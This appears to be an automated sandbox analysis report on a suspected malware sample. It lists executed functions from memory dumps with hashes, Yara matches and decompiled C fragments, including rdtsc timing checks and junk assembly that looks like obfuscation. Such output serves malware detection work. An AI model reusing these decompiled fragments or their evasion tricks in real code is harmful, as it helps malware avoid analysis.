Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03059A0A

Memory Dump Source

Source File: 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 1a175364b4474f26d7e25160671380e871166fb7be9ab0b6df0b09ffae0f9b68
Instruction ID: f553b30f9b05a2b9d8ba38dd85a130324fd3bb4e3d3636ca7fd5ed8c02f4504c
Opcode Fuzzy Hash: 1a175364b4474f26d7e25160671380e871166fb7be9ab0b6df0b09ffae0f9b68
Instruction Fuzzy Hash: 0490027130244D02D100A15A881470B014597D0352F51C011A1154555D8B65885175B1

Uniqueness

Uniqueness Score: -1.00%

Function 03059A20, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03059A2A

Memory Dump Source

Source File: 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: abe07eac025d165e0b25f567828438814a09c785c55e0655f81d19bea2a926d4
Instruction ID: a46b16cba9a8c5da1f7ebdd5058d7fd5f6f14ca8ced8e3623531ac70b12a4f42
Opcode Fuzzy Hash: abe07eac025d165e0b25f567828438814a09c785c55e0655f81d19bea2a926d4
Instruction Fuzzy Hash: 3D900261702049424140B16AC8449064145BBE1261751C121A0988550D8A99886566A5

Uniqueness

Uniqueness Score: -1.00%

Function 03059A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03059A5A

Memory Dump Source

Source File: 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 552431cfcfd57d264c69ec5cbb6328e12f8f7d5cce0fb8fc0a0504c7d2ef6b9a
Instruction ID: 91b3a96cdccab5d221cf016eb07dcd1b06bf02b3fcd5dea193c2eb85003c85f6
Opcode Fuzzy Hash: 552431cfcfd57d264c69ec5cbb6328e12f8f7d5cce0fb8fc0a0504c7d2ef6b9a
Instruction Fuzzy Hash: EF90026131284942D200A56A8C14B07014597D0353F51C115A0144554CCE5588616561

Uniqueness

Uniqueness Score: -1.00%

Function 03059910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0305991A

Memory Dump Source

Source File: 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: bd7d4b9d595ffc45566ec151c05c8ad81acd91fda886c77117354254ba07d29a
Instruction ID: e1f19c6225c0e560deffc546763f51836d9896b06d55c0be66b8d481ff52d407
Opcode Fuzzy Hash: bd7d4b9d595ffc45566ec151c05c8ad81acd91fda886c77117354254ba07d29a
Instruction Fuzzy Hash: AF9002B130204D02D140B15A8404746014597D0351F51C011A5054554E8B998DD576A5

Uniqueness

Uniqueness Score: -1.00%

Function 030599A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 030599AA

Memory Dump Source

Source File: 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 374bada3470acd23d93c5017733eeeb522c35a6f2cbc72f2ccdc016926461d99
Instruction ID: 56ea4cdb5612e8ef2edf9c89e04c4043622baf86b2f126efa1160979c0d201aa
Opcode Fuzzy Hash: 374bada3470acd23d93c5017733eeeb522c35a6f2cbc72f2ccdc016926461d99
Instruction Fuzzy Hash: DF9002A134204D42D100A15A8414B060145D7E1351F51C015E1054554D8B59CC527166

Uniqueness

Uniqueness Score: -1.00%

Function 03059840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0305984A

Memory Dump Source

Source File: 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 24aa30826aafda0bdac3ad3239df90ef79d8c01a2a95a9cf1cf6be6085443f7c
Instruction ID: 0c0fb22e84a3bab07e6dfecf2892370141fa9b7138f66030c66a4de53ea491bf
Opcode Fuzzy Hash: 24aa30826aafda0bdac3ad3239df90ef79d8c01a2a95a9cf1cf6be6085443f7c
Instruction Fuzzy Hash: A890026134308A525545F15A84045074146A7E0291791C012A1404950C8A669856E661

Uniqueness

Uniqueness Score: -1.00%

Function 03059860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0305986A

Memory Dump Source

Source File: 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 0ce1e8ae7af16cc976610724cc8eba8ac90c7dc265b8a464028195098d16b63a
Instruction ID: 224a51737757a6d447365fb2f6f44a9247a26740a72d7dd5921c31b622cd5225
Opcode Fuzzy Hash: 0ce1e8ae7af16cc976610724cc8eba8ac90c7dc265b8a464028195098d16b63a
Instruction Fuzzy Hash: E890027130204D13D111A15A8504707014997D0291F91C412A0414558D9B968952B161

Uniqueness

Uniqueness Score: -1.00%

Function 030598F0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 030598FA

Memory Dump Source

Source File: 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3e86be9881d6bce20593b57c98d23c6ca6cf146eb76199ae98298ebed53ee769
Instruction ID: 5d3e3449545bb3ec8c3d030730fb06baff170c8c440d76f57c8f1c10722d95d2
Opcode Fuzzy Hash: 3e86be9881d6bce20593b57c98d23c6ca6cf146eb76199ae98298ebed53ee769
Instruction Fuzzy Hash: AB90026170204E02D101B15A8404616014A97D0291F91C022A1014555ECF658992B171

Uniqueness

Uniqueness Score: -1.00%

Function 03059710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0305971A

Memory Dump Source

Source File: 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 5299aa5bd504ad39984585875942909289f21f995d4192e8305bfe9dbe615dce
Instruction ID: 6cc1120ab8dea6adedd32b5e8ae3fa824c7df35948545b4362207fcb3caef36f
Opcode Fuzzy Hash: 5299aa5bd504ad39984585875942909289f21f995d4192e8305bfe9dbe615dce
Instruction Fuzzy Hash: E090027130204D02D100A59A9408646014597E0351F51D011A5014555ECBA588917171

Uniqueness

Uniqueness Score: -1.00%

Function 03059780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0305978A

Memory Dump Source

Source File: 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4b976092c4a81815c70abce7e832bfd8e2668aa36ca7d54adcdfe2b8a4f59467
Instruction ID: 516d439fc06cf643b305147a66ddd7e9a54ff8b06b58c57bbdb0b7e076a80cca
Opcode Fuzzy Hash: 4b976092c4a81815c70abce7e832bfd8e2668aa36ca7d54adcdfe2b8a4f59467
Instruction Fuzzy Hash: C490026931304902D180B15A940860A014597D1252F91D415A0005558CCE5588696361

Uniqueness

Uniqueness Score: -1.00%

Function 030597A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 030597AA

Memory Dump Source

Source File: 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 5875c0e1319f0daa0b71924bf5417328bea1e99266080c3af90063aee94af998
Instruction ID: 6934191680aa381d7d366cd85faec44d5be11d4635dd1dcdb368f40909186025
Opcode Fuzzy Hash: 5875c0e1319f0daa0b71924bf5417328bea1e99266080c3af90063aee94af998
Instruction Fuzzy Hash: 5790026130204903D140B15A94186064145E7E1351F51D011E0404554CDE5588566262

Uniqueness

Uniqueness Score: -1.00%

Function 03059FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03059FEA

Memory Dump Source

Source File: 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a34ef46297e3f4a9a1a2766b43e8090c0127fb7ea9d3a18e3ce78d0605f0a681
Instruction ID: 3c8f4a2e943d2db6e64210cb1acfe4de09cd2b5bf3487c6106479348f8f9b6ac
Opcode Fuzzy Hash: a34ef46297e3f4a9a1a2766b43e8090c0127fb7ea9d3a18e3ce78d0605f0a681
Instruction Fuzzy Hash: 3690027131218D02D110A15AC404706014597D1251F51C411A0814558D8BD588917162

Uniqueness

Uniqueness Score: -1.00%

Function 03059660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0305966A

Memory Dump Source

Source File: 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b17637da84a345c6233528760c46d37bc83b0e913f0b6f2c3939bc3b2c4d52ed
Instruction ID: 8abe9067f38a0b4129cf6c6f4bbbf1c3519be141fc47aa2870634fa00c3a0787
Opcode Fuzzy Hash: b17637da84a345c6233528760c46d37bc83b0e913f0b6f2c3939bc3b2c4d52ed
Instruction Fuzzy Hash: 2890027130204D02D180B15A840464A014597D1351F91C015A0015654DCF558A5977E1

Uniqueness

Uniqueness Score: -1.00%

Function 030596E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 030596EA

Memory Dump Source

Source File: 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 27dad37219b1eef67d3840813d4acbf7eea0f397680c28224841b6261643eedc
Instruction ID: ae04dd8f0a21e1a8b4b6361157f2e3616ec19291714cc382f8202b27f87b3e88
Opcode Fuzzy Hash: 27dad37219b1eef67d3840813d4acbf7eea0f397680c28224841b6261643eedc
Instruction Fuzzy Hash: 729002713020CD02D110A15AC40474A014597D0351F55C411A4414658D8BD588917161

Uniqueness

Uniqueness Score: -1.00%

Function 03059540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0305954A

Memory Dump Source

Source File: 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3a8cdc753274b02a5490efc242f5d4e860802b98ced8bf10743e2c18d227c49c
Instruction ID: ca03d3b1c43f48e646f99e2a7c16ed1d4cef88ca242cbf8a9be85de847b520ac
Opcode Fuzzy Hash: 3a8cdc753274b02a5490efc242f5d4e860802b98ced8bf10743e2c18d227c49c
Instruction Fuzzy Hash: DF900265312049030105E55A4704507018697D53A1351C021F1005550CDB6188616161

Uniqueness

Uniqueness Score: -1.00%

Function 030595D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 030595DA

Memory Dump Source

Source File: 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6e7f2b1d3178af2f841ec31976d2b08e6c9cc9b3f6e0283a62d6837caaebb974
Instruction ID: 4d0c71a81d61fc42340332060a2ceb7bd6b94a4c229ef821ec65e21b3e80e6e6
Opcode Fuzzy Hash: 6e7f2b1d3178af2f841ec31976d2b08e6c9cc9b3f6e0283a62d6837caaebb974
Instruction Fuzzy Hash: 8C9002A1303049034105B15A8414616414A97E0251B51C021E1004590DCA6588917165

Uniqueness

Uniqueness Score: -1.00%

Function 00408880, Relevance: .1, Instructions: 92
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E00408880(intOrPtr* _a4) {
				intOrPtr _v8;
				char _v24;
				char _v284;
				char _v804;
				char _v840;
				void* _t24;
				void* _t31;
				void* _t33;
				void* _t34;
				void* _t39;
				void* _t50;
				intOrPtr* _t52;
				void* _t53;
				void* _t54;
				void* _t55;
				void* _t56;

				_t52 = _a4;
				_t39 = 0; // executed
				_t24 = E00406C00(_t52,  &_v24); // executed
				_t54 = _t53 + 8;
				if(_t24 != 0) {
					E00406E10( &_v24,  &_v840);
					_t55 = _t54 + 8;
					do {
						E00419C90( &_v284, 0x104);
						E0041A300( &_v284,  &_v804);
						_t56 = _t55 + 0x10;
						_t50 = 0x4f;
						while(1) {
							_t31 = E00413D90(E00413D30(_t52, _t50),  &_v284);
							_t56 = _t56 + 0x10;
							if(_t31 != 0) {
								break;
							}
							_t50 = _t50 + 1;
							if(_t50 <= 0x62) {
								continue;
							} else {
							}
							goto L8;
						}
						_t9 = _t52 + 0x14; // 0xffffdfd5
						 *(_t52 + 0x474) =  *(_t52 + 0x474) ^  *_t9;
						_t39 = 1;
						L8:
						_t33 = E00406E40( &_v24,  &_v840);
						_t55 = _t56 + 8;
					} while (_t33 != 0 && _t39 == 0);
					_t34 = E00406EC0(_t52,  &_v24); // executed
					if(_t39 == 0) {
						asm("rdtsc");
						asm("rdtsc");
						_v8 = _t34 - 0 + _t34;
						 *((intOrPtr*)(_t52 + 0x55c)) =  *((intOrPtr*)(_t52 + 0x55c)) + 0xffffffba;
					}
					 *((intOrPtr*)(_t52 + 0x31)) =  *((intOrPtr*)(_t52 + 0x31)) + _t39;
					_t20 = _t52 + 0x31; // 0x5608758b
					 *((intOrPtr*)(_t52 + 0x32)) =  *((intOrPtr*)(_t52 + 0x32)) +  *_t20 + 1;
					return 1;
				} else {
					return _t24;
				}
			}

0x0040888b
0x00408893
0x00408895
0x0040889a
0x0040889f
0x004088b2
0x004088b7
0x004088c0
0x004088cc
0x004088df
0x004088e4
0x004088e7
0x004088f0
0x00408902
0x00408907
0x0040890c
0x00000000
0x00000000
0x0040890e
0x00408912
0x00000000
0x00000000
0x00408914
0x00000000
0x00408912
0x00408916
0x00408919
0x0040891f
0x00408921
0x0040892c
0x00408931
0x00408934
0x00408941
0x0040894c
0x0040894e
0x00408954
0x00408958
0x0040895b
0x0040895b
0x00408962
0x00408965
0x0040896a
0x00408977
0x004088a6
0x004088a6
0x004088a6

Memory Dump Source

Source File: 00000002.00000002.272602970.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 42d0d5b762ed767f255d0158a4eaae86d93edb632e728fa2293ce1f2afc345c0
Instruction ID: 4c617b39c0906e70e5cb6cd40e0abf5b3059e0cce04910c40f127af8aed32689
Opcode Fuzzy Hash: 42d0d5b762ed767f255d0158a4eaae86d93edb632e728fa2293ce1f2afc345c0
Instruction Fuzzy Hash: D221FBB3D4020857DB15E664EE42AFF73AC9B50304F44047FE989A2181F6386B5987A6

Uniqueness

Uniqueness Score: -1.00%

Function 00418450, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

C-Code - Quality: 36%

			E00418450(intOrPtr _a4, void* _a8, intOrPtr _a12, void* _a16) {
				intOrPtr _t9;
				void* _t10;
				void* _t12;
				void* _t15;

				E00418D80(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
				_t9 = _a12;
				_t12 = _a8;
				asm("adc al, 0x52");
				_push(_t9);
				_t10 = RtlAllocateHeap(_t12); // executed
				return _t10;
			}

0x00418467
0x0041846f
0x00418472
0x00418477
0x0041847b
0x0041847d
0x00418481

APIs

RtlAllocateHeap.NTDLL(004134D6,?,O<A,00413C4F,?,004134D6,?,?,?,?,?,00000000,00408AC3,?), ref: 0041847D

Strings

O<A, xrefs: 0041846C, 00418478

Memory Dump Source

Source File: 00000002.00000002.272602970.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateHeap
String ID: O<A
API String ID: 1279760036-4138670870
Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction ID: 9fa6c2a4f9633cfc5a37005c67ac026404774a63ffe1ff48ae04740aea020376
Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction Fuzzy Hash: F5E012B1200208ABDB14EF99DC41EA777ACAF88654F158559FA085B282CA30F9108AF0

Uniqueness

Uniqueness Score: -1.00%

Function 00418661, Relevance: 1.6, APIs: 1, Instructions: 58COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CF72,0040CF72,00000041,00000000,?,00408B35), ref: 00418620

Memory Dump Source

Source File: 00000002.00000002.272602970.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 20f181ee2f9a4d403659a02d29da09e451f013aed3185484192611c5c9dd44b2
Instruction ID: 28c1cd049c30f16bbecfebfc575b003bba396da139df6114ca21f80d6bd29f66
Opcode Fuzzy Hash: 20f181ee2f9a4d403659a02d29da09e451f013aed3185484192611c5c9dd44b2
Instruction Fuzzy Hash: 4C019EB62002047BDB10EF98DC84EE777ADEF89360F008559F90D5B242DA35E9418BB4

Uniqueness

Uniqueness Score: -1.00%

Function 00407070, Relevance: 1.6, APIs: 1, Instructions: 55
threadwindowCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E00407070(void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				intOrPtr* _t13;
				int _t14;
				long _t21;
				intOrPtr* _t25;
				void* _t26;
				void* _t30;

				_t30 = __eflags;
				_v68 = 0;
				E00419CE0( &_v67, 0, 0x3f);
				E0041A8C0( &_v68, 3);
				_t13 = E00413DF0(_a4 + 0x1c, E00409AF0(_t30, _a4 + 0x1c,  &_v68), 0, 0, 0xc4e7b6d6);
				_t25 = _t13;
				if(_t25 != 0) {
					_t21 = _a8;
					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
					_t32 = _t14;
					if(_t14 == 0) {
						_t14 =  *_t25(_t21, 0x8003, _t26 + (E00409250(_t32, 1, 8) & 0x000000ff) - 0x40, _t14);
					}
					return _t14;
				}
				return _t13;
			}

0x00407070
0x0040707f
0x00407083
0x0040708e
0x004070ae
0x004070b3
0x004070ba
0x004070bd
0x004070ca
0x004070cc
0x004070ce
0x004070eb
0x004070eb
0x00000000
0x004070ed
0x004070f2

APIs

PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004070CA

Memory Dump Source

Source File: 00000002.00000002.272602970.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 1bc65d02fe6496cc537dcaa5988f1c03b553ae92fcf2c31df00b834e94756268
Instruction ID: 18ef527c81d78d6cf94a666dde549eb5d4912ba5f30213c62aa7d6dc7e6a36c6
Opcode Fuzzy Hash: 1bc65d02fe6496cc537dcaa5988f1c03b553ae92fcf2c31df00b834e94756268
Instruction Fuzzy Hash: A601A731A8022877E720AA959C43FFF776C9B40B55F04411AFF04BA1C2E6E8790646FA

Uniqueness

Uniqueness Score: -1.00%

Function 00418595, Relevance: 1.6, APIs: 1, Instructions: 53COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CF72,0040CF72,00000041,00000000,?,00408B35), ref: 00418620

Memory Dump Source

Source File: 00000002.00000002.272602970.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 2595a0c037b8fa077421c6b0199177a60158fe03142308ca9ae15853212dffc4
Instruction ID: 7af15cd47dbe46ff6c08a813766486ecbeb00b55857519d93dd56ba7f348f973
Opcode Fuzzy Hash: 2595a0c037b8fa077421c6b0199177a60158fe03142308ca9ae15853212dffc4
Instruction Fuzzy Hash: 58018CB5200248AFDB10EF59DC81EEB7BADEF89354F158549FD8897642CA34E814CBB4

Uniqueness

Uniqueness Score: -1.00%

Function 00418482, Relevance: 1.5, APIs: 1, Instructions: 25
memoryCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E00418482(void* __ecx, signed int __edx, void* __fp0, intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t16;
				void* _t23;
				signed int _t27;

				asm("cli");
				asm("sti");
				asm("das");
				asm("out dx, eax");
				asm("adc eax, 0xf4d7ec55");
				 *(0x458bec8b + __edx * 2) =  *(0x458bec8b + __edx * 2) ^ _t27;
				_push(_t27);
				_t13 = _a4;
				_t9 = _t13 + 0xc74; // 0xc74
				E00418D80(_t23, _a4, _t9,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t16 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t16;
			}

0x00418482
0x00418483
0x00418484
0x00418488
0x00418489
0x0041848e
0x00418490
0x00418493
0x0041849f
0x004184a7
0x004184bd
0x004184c1

APIs

RtlFreeHeap.NTDLL(00000060,00408AC3,?,?,00408AC3,00000060,00000000,00000000,?,?,00408AC3,?,00000000), ref: 004184BD

Memory Dump Source

Source File: 00000002.00000002.272602970.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 4ab70dede3f9c5464aee8c2cea39ce3d83c76a55d2aa76cc1ff6b9666d29efd3
Instruction ID: 751f87b4307d05d44f2204c6af7428c6d423610a7451941b74262ee4c36af803
Opcode Fuzzy Hash: 4ab70dede3f9c5464aee8c2cea39ce3d83c76a55d2aa76cc1ff6b9666d29efd3
Instruction Fuzzy Hash: EEE0D8B81242455BDB14FF75E88089737A6AF81314314455EE84997617CA36D46987A0

Uniqueness

Uniqueness Score: -1.00%

Function 00418490, Relevance: 1.5, APIs: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00418490(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;
				void* _t15;

				_t3 = _a4 + 0xc74; // 0xc74
				E00418D80(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}

0x0041849f
0x004184a7
0x004184bd
0x004184c1

APIs

RtlFreeHeap.NTDLL(00000060,00408AC3,?,?,00408AC3,00000060,00000000,00000000,?,?,00408AC3,?,00000000), ref: 004184BD

Memory Dump Source

Source File: 00000002.00000002.272602970.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction ID: 03c2f956527c42d7b276241e6fe07b9733b4616027d909c5946ae0997d1efc6f
Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction Fuzzy Hash: 4EE01AB12002086BD714EF59DC45EA777ACAF88750F014559F90857241C630E9108AF0

Uniqueness

Uniqueness Score: -1.00%

Function 004185F0, Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CF72,0040CF72,00000041,00000000,?,00408B35), ref: 00418620

Memory Dump Source

Source File: 00000002.00000002.272602970.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction ID: 86199f88c9bc95069a3839d85b69f3b768b26ac3f426fe44f4acef71e1d37d6b
Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction Fuzzy Hash: 75E01AB12002086BDB10EF49DC85EE737ADAF89650F018159FA0857241C934E8108BF5

Uniqueness

Uniqueness Score: -1.00%

Function 004184D0, Relevance: 1.5, APIs: 1, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004184D0(intOrPtr _a4, int _a8) {
				void* _t10;

				_t5 = _a4;
				E00418D80(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
				ExitProcess(_a8);
			}

0x004184d3
0x004184ea
0x004184f8

APIs

ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 004184F8

Memory Dump Source

Source File: 00000002.00000002.272602970.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction ID: 9f0e6789d667daaae8a14a3bb2a3edfd4f0b4b377582a99054e252b8191c9f04
Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction Fuzzy Hash: 06D012716403187BD620EF99DC85FD7779CDF49750F058069FA1C5B241C531BA0086E1

Uniqueness

Uniqueness Score: -1.00%

Function 004184C4, Relevance: 1.5, APIs: 1, Instructions: 17memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(004134D6,?,O<A,00413C4F,?,004134D6,?,?,?,?,?,00000000,00408AC3,?), ref: 0041847D

Memory Dump Source

Source File: 00000002.00000002.272602970.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 8b57812a0cbed7a5b2e781b905e30819b576ee6384743d049dec2b73b6e88208
Instruction ID: 3281fa91f542b964f6d3163c050f9f8371de8ef047ac085fb993fc17d5efaa51
Opcode Fuzzy Hash: 8b57812a0cbed7a5b2e781b905e30819b576ee6384743d049dec2b73b6e88208
Instruction Fuzzy Hash: 66C08CB500101029D32292A0FC40EF2BB1CCBC7BB5B21494AF2CC12010883698421A70

Uniqueness

Uniqueness Score: -1.00%

Function 0305967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03059694

Memory Dump Source

Source File: 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d66761a1ec3e54edb2538db56f521df118816241dc13c0679a572e0023c23f02
Instruction ID: fb6b19162abff3d6e4bbbcafb3fbefefb87c35e82efae2b78b8301bcd1f718d1
Opcode Fuzzy Hash: d66761a1ec3e54edb2538db56f521df118816241dc13c0679a572e0023c23f02
Instruction Fuzzy Hash: 93B09B719034CAC5D651D76146087177A8477D0751F16C051E1020641F4778C095F5B5

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 030CB260, Relevance: 37.8, Strings: 30, Instructions: 262COMMON

Download Yara Rule

Strings

<unknown>, xrefs: 030CB27E, 030CB2D1, 030CB350, 030CB399, 030CB417, 030CB48E
an invalid address, %p, xrefs: 030CB4CF
*** enter .exr %p for the exception record, xrefs: 030CB4F1
*** Inpage error in %ws:%s, xrefs: 030CB418
The instruction at %p referenced memory at %p., xrefs: 030CB432
*** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 030CB53F
*** Resource timeout (%p) in %ws:%s, xrefs: 030CB352
read from, xrefs: 030CB4AD, 030CB4B2
The instruction at %p tried to %s , xrefs: 030CB4B6
This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 030CB47D
This means that the I/O device reported an I/O error. Check your hardware., xrefs: 030CB476
Go determine why that thread has not released the critical section., xrefs: 030CB3C5
The resource is owned shared by %d threads, xrefs: 030CB37E
This failed because of error %Ix., xrefs: 030CB446
*** enter .cxr %p for the context, xrefs: 030CB50D
a NULL pointer, xrefs: 030CB4E0
write to, xrefs: 030CB4A6
The critical section is owned by thread %p., xrefs: 030CB3B9
*** A stack buffer overrun occurred in %ws:%s, xrefs: 030CB2F3
The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 030CB38F
